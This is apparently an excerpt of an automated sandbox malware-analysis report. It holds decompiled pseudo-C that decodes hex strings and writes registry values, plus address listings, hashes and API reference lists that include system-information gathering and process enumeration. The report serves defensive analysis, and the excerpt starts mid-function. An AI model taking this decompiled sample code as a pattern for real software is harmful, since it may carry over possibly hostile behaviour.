                                                                                                                                                                                                                                                                                          						__eflags = _t106 - 0xffffffff;
                                                                                                                                                                                                                                                                                          						if(_t106 <= 0xffffffff) {
                                                                                                                                                                                                                                                                                          							goto L44;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L43;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          						_v4392 = 0;
                                                                                                                                                                                                                                                                                          						_v8 = 3;
                                                                                                                                                                                                                                                                                          						_t119 = lstrlenA( &_v4124);
                                                                                                                                                                                                                                                                                          						_t170 =  &_v4396;
                                                                                                                                                                                                                                                                                          						_v4396 = _t119 + 1;
                                                                                                                                                                                                                                                                                          						_t121 = E000F1000(_t119 + 1, _t182,  &_v4396);
                                                                                                                                                                                                                                                                                          						_t215 = _t214 + 4;
                                                                                                                                                                                                                                                                                          						__eflags = _t121;
                                                                                                                                                                                                                                                                                          						if(_t121 < 0) {
                                                                                                                                                                                                                                                                                          							L38:
                                                                                                                                                                                                                                                                                          							E000FA200( &_v4392);
                                                                                                                                                                                                                                                                                          							_t96 = 0x8007000e;
                                                                                                                                                                                                                                                                                          							goto L65;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t159 = _v4396;
                                                                                                                                                                                                                                                                                          						__eflags = _t159 - 0x400;
                                                                                                                                                                                                                                                                                          						if(_t159 > 0x400) {
                                                                                                                                                                                                                                                                                          							L36:
                                                                                                                                                                                                                                                                                          							_t207 = E000FA1D0(_t159, _t170, _t194,  &_v4392);
                                                                                                                                                                                                                                                                                          							L37:
                                                                                                                                                                                                                                                                                          							_t182 = _t159 >> 1;
                                                                                                                                                                                                                                                                                          							_t126 = E000F10E0( &_v4124, _t159 >> 1, _t207, 3);
                                                                                                                                                                                                                                                                                          							__eflags = _t126;
                                                                                                                                                                                                                                                                                          							if(_t126 != 0) {
                                                                                                                                                                                                                                                                                          								__imp__#277(_t126, 0, 0,  &_v4412);
                                                                                                                                                                                                                                                                                          								_t182 = _v4400;
                                                                                                                                                                                                                                                                                          								_v4396 = _v4412;
                                                                                                                                                                                                                                                                                          								_t161 =  *_v4404;
                                                                                                                                                                                                                                                                                          								_t158 = RegSetValueExA( *_v4404, _v4400, 0, 4,  &_v4396, 4);
                                                                                                                                                                                                                                                                                          								E000FA200( &_v4392);
                                                                                                                                                                                                                                                                                          								goto L62;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L38;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t131 = E000F1030( &_v4396, _t182, _t159);
                                                                                                                                                                                                                                                                                          						_t216 = _t215 + 4;
                                                                                                                                                                                                                                                                                          						__eflags = _t131;
                                                                                                                                                                                                                                                                                          						if(_t131 == 0) {
                                                                                                                                                                                                                                                                                          							goto L36;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E0010ACA0(_t159);
                                                                                                                                                                                                                                                                                          						_v20 = _t216;
                                                                                                                                                                                                                                                                                          						_t207 = _t216;
                                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					__eflags = _t102 - 8;
                                                                                                                                                                                                                                                                                          					if(_t102 == 8) {
                                                                                                                                                                                                                                                                                          						_t161 = _v4400;
                                                                                                                                                                                                                                                                                          						_t182 = _v4404;
                                                                                                                                                                                                                                                                                          						_t158 = E000F18A0( &_v4124, _v4404, _v4400);
                                                                                                                                                                                                                                                                                          						goto L62;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					__eflags = _t102 - 0x11;
                                                                                                                                                                                                                                                                                          					if(_t102 != 0x11) {
                                                                                                                                                                                                                                                                                          						goto L64;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t135 = lstrlenA( &_v4124);
                                                                                                                                                                                                                                                                                          					_t160 = _t135;
                                                                                                                                                                                                                                                                                          					_v4396 = _t160;
                                                                                                                                                                                                                                                                                          					__eflags = _t160 & 0x00000001;
                                                                                                                                                                                                                                                                                          					if((_t160 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                          						L18:
                                                                                                                                                                                                                                                                                          						_t96 = 0x80004005;
                                                                                                                                                                                                                                                                                          						goto L65;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					_t198 = _t135 - _t182 >> 1;
                                                                                                                                                                                                                                                                                          					_v4392 = _t198;
                                                                                                                                                                                                                                                                                          					_v4388 = 0;
                                                                                                                                                                                                                                                                                          					_v8 = 4;
                                                                                                                                                                                                                                                                                          					_v8 = 5;
                                                                                                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                                                                                                          					if(0 > 0) {
                                                                                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                                                                                          						_push(0x80070216);
                                                                                                                                                                                                                                                                                          						E000F1170(_t182);
                                                                                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                                                                                          						__eflags = _t198 - 0x100;
                                                                                                                                                                                                                                                                                          						if(__eflags <= 0) {
                                                                                                                                                                                                                                                                                          							_v4388 =  &_v4384;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t182 =  &_v4388;
                                                                                                                                                                                                                                                                                          							E000FFF60(_t198,  &_v4388, _t198, 0, __eflags,  &_v4388);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t140 = _v4388;
                                                                                                                                                                                                                                                                                          						__eflags = _t140;
                                                                                                                                                                                                                                                                                          						if(_t140 != 0) {
                                                                                                                                                                                                                                                                                          							E00106820(_t140, 0, _t198);
                                                                                                                                                                                                                                                                                          							_t210 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = _t160;
                                                                                                                                                                                                                                                                                          							if(_t160 <= 0) {
                                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                                          								_t161 = _v4388;
                                                                                                                                                                                                                                                                                          								_t182 = _v4400;
                                                                                                                                                                                                                                                                                          								_t158 = RegSetValueExA( *_v4404, _v4400, 0, 3, _v4388, _t198);
                                                                                                                                                                                                                                                                                          								__eflags = _v4388 -  &_v4384;
                                                                                                                                                                                                                                                                                          								if(_v4388 !=  &_v4384) {
                                                                                                                                                                                                                                                                                          									E000FD040( &_v4388);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L62;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								_t147 =  *((intOrPtr*)(_t211 + _t210 - 0x1018));
                                                                                                                                                                                                                                                                                          								_t190 =  &(_v4388[_t210 >> 1]);
                                                                                                                                                                                                                                                                                          								_t174 = _t147 + 0xffffffd0;
                                                                                                                                                                                                                                                                                          								__eflags = _t174 - 0x36;
                                                                                                                                                                                                                                                                                          								if(_t174 > 0x36) {
                                                                                                                                                                                                                                                                                          									L26:
                                                                                                                                                                                                                                                                                          									_t148 = 0;
                                                                                                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t33 = _t174 + 0xf320c; // 0x43500003
                                                                                                                                                                                                                                                                                          								switch( *((intOrPtr*)(( *_t33 & 0x000000ff) * 4 +  &M000F31FC))) {
                                                                                                                                                                                                                                                                                          									case 0:
                                                                                                                                                                                                                                                                                          										_t148 = _t147 - 0x30;
                                                                                                                                                                                                                                                                                          										goto L27;
                                                                                                                                                                                                                                                                                          									case 1:
                                                                                                                                                                                                                                                                                          										__al = __al - 0x37;
                                                                                                                                                                                                                                                                                          										goto L27;
                                                                                                                                                                                                                                                                                          									case 2:
                                                                                                                                                                                                                                                                                          										__al = __al - 0x57;
                                                                                                                                                                                                                                                                                          										goto L27;
                                                                                                                                                                                                                                                                                          									case 3:
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L27:
                                                                                                                                                                                                                                                                                          								_t177 = (_t210 & 0x00000001) + (_t210 & 0x00000001);
                                                                                                                                                                                                                                                                                          								_t210 = _t210 + 1;
                                                                                                                                                                                                                                                                                          								 *_t190 =  *_t190 | _t148 << 0x00000004 - _t177 + _t177;
                                                                                                                                                                                                                                                                                          								__eflags = _t210 - _t160;
                                                                                                                                                                                                                                                                                          							} while (_t210 < _t160);
                                                                                                                                                                                                                                                                                          							_t198 = _v4392;
                                                                                                                                                                                                                                                                                          							goto L29;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							__eflags =  &_v4384;
                                                                                                                                                                                                                                                                                          							if( &_v4384 != 0) {
                                                                                                                                                                                                                                                                                          								E000FD040( &_v4388);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L18;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					__eflags = _t198 - 0xffffffff;
                                                                                                                                                                                                                                                                                          					if(_t198 <= 0xffffffff) {
                                                                                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t96 = 0x80020009;
                                                                                                                                                                                                                                                                                          					goto L65;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



























































                                                                                                                                                                                                                                                                                          0x000f2d60
                                                                                                                                                                                                                                                                                          0x000f2d60
                                                                                                                                                                                                                                                                                          0x000f2d63
                                                                                                                                                                                                                                                                                          0x000f2d65
                                                                                                                                                                                                                                                                                          0x000f2d70
                                                                                                                                                                                                                                                                                          0x000f2d71
                                                                                                                                                                                                                                                                                          0x000f2d77
                                                                                                                                                                                                                                                                                          0x000f2d7c
                                                                                                                                                                                                                                                                                          0x000f2d81
                                                                                                                                                                                                                                                                                          0x000f2d83
                                                                                                                                                                                                                                                                                          0x000f2d89
                                                                                                                                                                                                                                                                                          0x000f2d8d
                                                                                                                                                                                                                                                                                          0x000f2d93
                                                                                                                                                                                                                                                                                          0x000f2d99
                                                                                                                                                                                                                                                                                          0x000f2d9c
                                                                                                                                                                                                                                                                                          0x000f2daa
                                                                                                                                                                                                                                                                                          0x000f2db0
                                                                                                                                                                                                                                                                                          0x000f2db6
                                                                                                                                                                                                                                                                                          0x000f2dbc
                                                                                                                                                                                                                                                                                          0x000f2dcd
                                                                                                                                                                                                                                                                                          0x000f31d5
                                                                                                                                                                                                                                                                                          0x000f31de
                                                                                                                                                                                                                                                                                          0x000f31e6
                                                                                                                                                                                                                                                                                          0x000f31e7
                                                                                                                                                                                                                                                                                          0x000f31e8
                                                                                                                                                                                                                                                                                          0x000f31f6
                                                                                                                                                                                                                                                                                          0x000f31f6
                                                                                                                                                                                                                                                                                          0x000f2de0
                                                                                                                                                                                                                                                                                          0x000f2de5
                                                                                                                                                                                                                                                                                          0x000f2dea
                                                                                                                                                                                                                                                                                          0x000f2df6
                                                                                                                                                                                                                                                                                          0x000f2e01
                                                                                                                                                                                                                                                                                          0x000f2e03
                                                                                                                                                                                                                                                                                          0x000f2e0a
                                                                                                                                                                                                                                                                                          0x000f2e0c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2e12
                                                                                                                                                                                                                                                                                          0x000f2e19
                                                                                                                                                                                                                                                                                          0x000f2e1c
                                                                                                                                                                                                                                                                                          0x000f30a7
                                                                                                                                                                                                                                                                                          0x000f30ac
                                                                                                                                                                                                                                                                                          0x000f31ba
                                                                                                                                                                                                                                                                                          0x000f31c6
                                                                                                                                                                                                                                                                                          0x000f31cd
                                                                                                                                                                                                                                                                                          0x000f31d2
                                                                                                                                                                                                                                                                                          0x000f31d3
                                                                                                                                                                                                                                                                                          0x000f31d3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f31d3
                                                                                                                                                                                                                                                                                          0x000f30b2
                                                                                                                                                                                                                                                                                          0x000f30bf
                                                                                                                                                                                                                                                                                          0x000f30c2
                                                                                                                                                                                                                                                                                          0x000f30ca
                                                                                                                                                                                                                                                                                          0x000f30cd
                                                                                                                                                                                                                                                                                          0x000f30d1
                                                                                                                                                                                                                                                                                          0x000f30d3
                                                                                                                                                                                                                                                                                          0x000f30da
                                                                                                                                                                                                                                                                                          0x000f30da
                                                                                                                                                                                                                                                                                          0x000f30df
                                                                                                                                                                                                                                                                                          0x000f30e4
                                                                                                                                                                                                                                                                                          0x000f30e4
                                                                                                                                                                                                                                                                                          0x000f30e9
                                                                                                                                                                                                                                                                                          0x000f3101
                                                                                                                                                                                                                                                                                          0x000f3107
                                                                                                                                                                                                                                                                                          0x000f30eb
                                                                                                                                                                                                                                                                                          0x000f30f2
                                                                                                                                                                                                                                                                                          0x000f30f2
                                                                                                                                                                                                                                                                                          0x000f310d
                                                                                                                                                                                                                                                                                          0x000f3113
                                                                                                                                                                                                                                                                                          0x000f3115
                                                                                                                                                                                                                                                                                          0x000f318f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f3117
                                                                                                                                                                                                                                                                                          0x000f3117
                                                                                                                                                                                                                                                                                          0x000f311e
                                                                                                                                                                                                                                                                                          0x000f3124
                                                                                                                                                                                                                                                                                          0x000f316c
                                                                                                                                                                                                                                                                                          0x000f316c
                                                                                                                                                                                                                                                                                          0x000f3178
                                                                                                                                                                                                                                                                                          0x000f318b
                                                                                                                                                                                                                                                                                          0x000f3194
                                                                                                                                                                                                                                                                                          0x000f3194
                                                                                                                                                                                                                                                                                          0x000f319a
                                                                                                                                                                                                                                                                                          0x000f31a0
                                                                                                                                                                                                                                                                                          0x000f31a8
                                                                                                                                                                                                                                                                                          0x000f31a8
                                                                                                                                                                                                                                                                                          0x000f31ad
                                                                                                                                                                                                                                                                                          0x000f31ad
                                                                                                                                                                                                                                                                                          0x000f31af
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f31b3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f31b3
                                                                                                                                                                                                                                                                                          0x000f3130
                                                                                                                                                                                                                                                                                          0x000f3131
                                                                                                                                                                                                                                                                                          0x000f3133
                                                                                                                                                                                                                                                                                          0x000f3135
                                                                                                                                                                                                                                                                                          0x000f3138
                                                                                                                                                                                                                                                                                          0x000f314a
                                                                                                                                                                                                                                                                                          0x000f314a
                                                                                                                                                                                                                                                                                          0x000f3150
                                                                                                                                                                                                                                                                                          0x000f3156
                                                                                                                                                                                                                                                                                          0x000f3158
                                                                                                                                                                                                                                                                                          0x000f3165
                                                                                                                                                                                                                                                                                          0x000f3165
                                                                                                                                                                                                                                                                                          0x000f3166
                                                                                                                                                                                                                                                                                          0x000f3166
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f3166
                                                                                                                                                                                                                                                                                          0x000f315a
                                                                                                                                                                                                                                                                                          0x000f315d
                                                                                                                                                                                                                                                                                          0x000f315e
                                                                                                                                                                                                                                                                                          0x000f315f
                                                                                                                                                                                                                                                                                          0x000f3161
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f3163
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f3163
                                                                                                                                                                                                                                                                                          0x000f313a
                                                                                                                                                                                                                                                                                          0x000f313d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f313f
                                                                                                                                                                                                                                                                                          0x000f3143
                                                                                                                                                                                                                                                                                          0x000f3146
                                                                                                                                                                                                                                                                                          0x000f3167
                                                                                                                                                                                                                                                                                          0x000f3167
                                                                                                                                                                                                                                                                                          0x000f3167
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f3130
                                                                                                                                                                                                                                                                                          0x000f3115
                                                                                                                                                                                                                                                                                          0x000f30d5
                                                                                                                                                                                                                                                                                          0x000f30d8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f30d8
                                                                                                                                                                                                                                                                                          0x000f2e22
                                                                                                                                                                                                                                                                                          0x000f2fbe
                                                                                                                                                                                                                                                                                          0x000f2fcb
                                                                                                                                                                                                                                                                                          0x000f2fd2
                                                                                                                                                                                                                                                                                          0x000f2fd8
                                                                                                                                                                                                                                                                                          0x000f2fe0
                                                                                                                                                                                                                                                                                          0x000f2fe6
                                                                                                                                                                                                                                                                                          0x000f2feb
                                                                                                                                                                                                                                                                                          0x000f2fee
                                                                                                                                                                                                                                                                                          0x000f2ff0
                                                                                                                                                                                                                                                                                          0x000f303f
                                                                                                                                                                                                                                                                                          0x000f3045
                                                                                                                                                                                                                                                                                          0x000f304a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f304a
                                                                                                                                                                                                                                                                                          0x000f2ff2
                                                                                                                                                                                                                                                                                          0x000f2ff8
                                                                                                                                                                                                                                                                                          0x000f2ffe
                                                                                                                                                                                                                                                                                          0x000f301b
                                                                                                                                                                                                                                                                                          0x000f3028
                                                                                                                                                                                                                                                                                          0x000f302a
                                                                                                                                                                                                                                                                                          0x000f302e
                                                                                                                                                                                                                                                                                          0x000f3036
                                                                                                                                                                                                                                                                                          0x000f303b
                                                                                                                                                                                                                                                                                          0x000f303d
                                                                                                                                                                                                                                                                                          0x000f3060
                                                                                                                                                                                                                                                                                          0x000f306c
                                                                                                                                                                                                                                                                                          0x000f307d
                                                                                                                                                                                                                                                                                          0x000f3089
                                                                                                                                                                                                                                                                                          0x000f309b
                                                                                                                                                                                                                                                                                          0x000f309d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f309d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f303d
                                                                                                                                                                                                                                                                                          0x000f3001
                                                                                                                                                                                                                                                                                          0x000f3006
                                                                                                                                                                                                                                                                                          0x000f3009
                                                                                                                                                                                                                                                                                          0x000f300b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f300f
                                                                                                                                                                                                                                                                                          0x000f3014
                                                                                                                                                                                                                                                                                          0x000f3017
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f3017
                                                                                                                                                                                                                                                                                          0x000f2e28
                                                                                                                                                                                                                                                                                          0x000f2e2b
                                                                                                                                                                                                                                                                                          0x000f2f9e
                                                                                                                                                                                                                                                                                          0x000f2fa4
                                                                                                                                                                                                                                                                                          0x000f2fb7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2fb7
                                                                                                                                                                                                                                                                                          0x000f2e31
                                                                                                                                                                                                                                                                                          0x000f2e34
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2e41
                                                                                                                                                                                                                                                                                          0x000f2e47
                                                                                                                                                                                                                                                                                          0x000f2e49
                                                                                                                                                                                                                                                                                          0x000f2e4f
                                                                                                                                                                                                                                                                                          0x000f2e52
                                                                                                                                                                                                                                                                                          0x000f2ee2
                                                                                                                                                                                                                                                                                          0x000f2ee2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2ee2
                                                                                                                                                                                                                                                                                          0x000f2e58
                                                                                                                                                                                                                                                                                          0x000f2e5d
                                                                                                                                                                                                                                                                                          0x000f2e5f
                                                                                                                                                                                                                                                                                          0x000f2e65
                                                                                                                                                                                                                                                                                          0x000f2e6d
                                                                                                                                                                                                                                                                                          0x000f2e74
                                                                                                                                                                                                                                                                                          0x000f2e78
                                                                                                                                                                                                                                                                                          0x000f2e7a
                                                                                                                                                                                                                                                                                          0x000f2e81
                                                                                                                                                                                                                                                                                          0x000f2e81
                                                                                                                                                                                                                                                                                          0x000f2e86
                                                                                                                                                                                                                                                                                          0x000f2e8b
                                                                                                                                                                                                                                                                                          0x000f2e8b
                                                                                                                                                                                                                                                                                          0x000f2e91
                                                                                                                                                                                                                                                                                          0x000f2ebd
                                                                                                                                                                                                                                                                                          0x000f2e93
                                                                                                                                                                                                                                                                                          0x000f2e93
                                                                                                                                                                                                                                                                                          0x000f2e9c
                                                                                                                                                                                                                                                                                          0x000f2e9c
                                                                                                                                                                                                                                                                                          0x000f2ec3
                                                                                                                                                                                                                                                                                          0x000f2ec9
                                                                                                                                                                                                                                                                                          0x000f2ecb
                                                                                                                                                                                                                                                                                          0x000f2ef0
                                                                                                                                                                                                                                                                                          0x000f2ef8
                                                                                                                                                                                                                                                                                          0x000f2efa
                                                                                                                                                                                                                                                                                          0x000f2efc
                                                                                                                                                                                                                                                                                          0x000f2f58
                                                                                                                                                                                                                                                                                          0x000f2f58
                                                                                                                                                                                                                                                                                          0x000f2f66
                                                                                                                                                                                                                                                                                          0x000f2f7a
                                                                                                                                                                                                                                                                                          0x000f2f82
                                                                                                                                                                                                                                                                                          0x000f2f88
                                                                                                                                                                                                                                                                                          0x000f2f94
                                                                                                                                                                                                                                                                                          0x000f2f94
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2f88
                                                                                                                                                                                                                                                                                          0x000f2f00
                                                                                                                                                                                                                                                                                          0x000f2f00
                                                                                                                                                                                                                                                                                          0x000f2f0e
                                                                                                                                                                                                                                                                                          0x000f2f14
                                                                                                                                                                                                                                                                                          0x000f2f17
                                                                                                                                                                                                                                                                                          0x000f2f1a
                                                                                                                                                                                                                                                                                          0x000f2f36
                                                                                                                                                                                                                                                                                          0x000f2f36
                                                                                                                                                                                                                                                                                          0x000f2f36
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2f36
                                                                                                                                                                                                                                                                                          0x000f2f1c
                                                                                                                                                                                                                                                                                          0x000f2f23
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2f2a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2f2e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2f32
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2f38
                                                                                                                                                                                                                                                                                          0x000f2f3d
                                                                                                                                                                                                                                                                                          0x000f2f4b
                                                                                                                                                                                                                                                                                          0x000f2f4c
                                                                                                                                                                                                                                                                                          0x000f2f4e
                                                                                                                                                                                                                                                                                          0x000f2f4e
                                                                                                                                                                                                                                                                                          0x000f2f52
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2ecd
                                                                                                                                                                                                                                                                                          0x000f2ed3
                                                                                                                                                                                                                                                                                          0x000f2ed5
                                                                                                                                                                                                                                                                                          0x000f2edd
                                                                                                                                                                                                                                                                                          0x000f2edd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2ed5
                                                                                                                                                                                                                                                                                          0x000f2ecb
                                                                                                                                                                                                                                                                                          0x000f2e7c
                                                                                                                                                                                                                                                                                          0x000f2e7f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2dec
                                                                                                                                                                                                                                                                                          0x000f2dec
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f2dec

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F2AB0: lstrcmpiA.KERNEL32 ref: 000F2B2C
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000F2E41
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcmpilstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3649823140-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0d43afc655c795b341ecbc7f3649dd3869571b128206b973e00981a563eb6849
                                                                                                                                                                                                                                                                                          • Instruction ID: 07f2b947cfde3424b2cf039efd744db40923b327432af2fcf96219b800718c38
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d43afc655c795b341ecbc7f3649dd3869571b128206b973e00981a563eb6849
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AC1A271A0022C9BDB28DB64CC41BFDB3F4AF49350F1041AAEB49A7A41D7749F85AF91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A747: GetVersionExA.KERNEL32(0000009C), ref: 0252A7BE
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A747: GetSystemInfo.KERNEL32(?), ref: 0252A7D0
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A747: lstrcat.KERNEL32(00000000,0400C8E8), ref: 0252A7F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A747: lstrcat.KERNEL32(00000000,0400C978), ref: 0252A9E9
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A747: lstrlen.KERNEL32(?), ref: 0252A9F6
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A747: lstrcat.KERNEL32(00000000,0400C980), ref: 0252AA09
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A747: lstrcat.KERNEL32(00000000,?), ref: 0252AA1A
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A747: lstrlen.KERNEL32(00000000), ref: 0252AA24
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252A747: lstrcat.KERNEL32(00000000,0400C984), ref: 0252AA3C
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 02526F09
                                                                                                                                                                                                                                                                                            • Part of subcall function 02523467: GetCurrentProcessId.KERNEL32(000000FF,00000128,00000002,00000000), ref: 025234B5
                                                                                                                                                                                                                                                                                            • Part of subcall function 02523467: Process32First.KERNEL32(000000FF,00000128), ref: 02523519
                                                                                                                                                                                                                                                                                            • Part of subcall function 02523467: lstrlen.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 0252353F
                                                                                                                                                                                                                                                                                            • Part of subcall function 02523467: lstrcpy.KERNEL32(?,?), ref: 02523559
                                                                                                                                                                                                                                                                                            • Part of subcall function 02523467: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0252356D
                                                                                                                                                                                                                                                                                            • Part of subcall function 02523467: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 025235A3
                                                                                                                                                                                                                                                                                            • Part of subcall function 02523467: GetModuleFileNameExA.PSAPI(00000000,?,?,?,00000000,?,00000004,00000000), ref: 025235C2
                                                                                                                                                                                                                                                                                            • Part of subcall function 02523467: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?,00000004,00000000), ref: 025235E8
                                                                                                                                                                                                                                                                                            • Part of subcall function 02523467: CloseHandle.KERNEL32(000000FF,000000FF,00000128,00000002,00000000), ref: 02523612
                                                                                                                                                                                                                                                                                            • Part of subcall function 0252B4E7: GetSystemDirectoryA.KERNEL32(?,00000103), ref: 0252B561
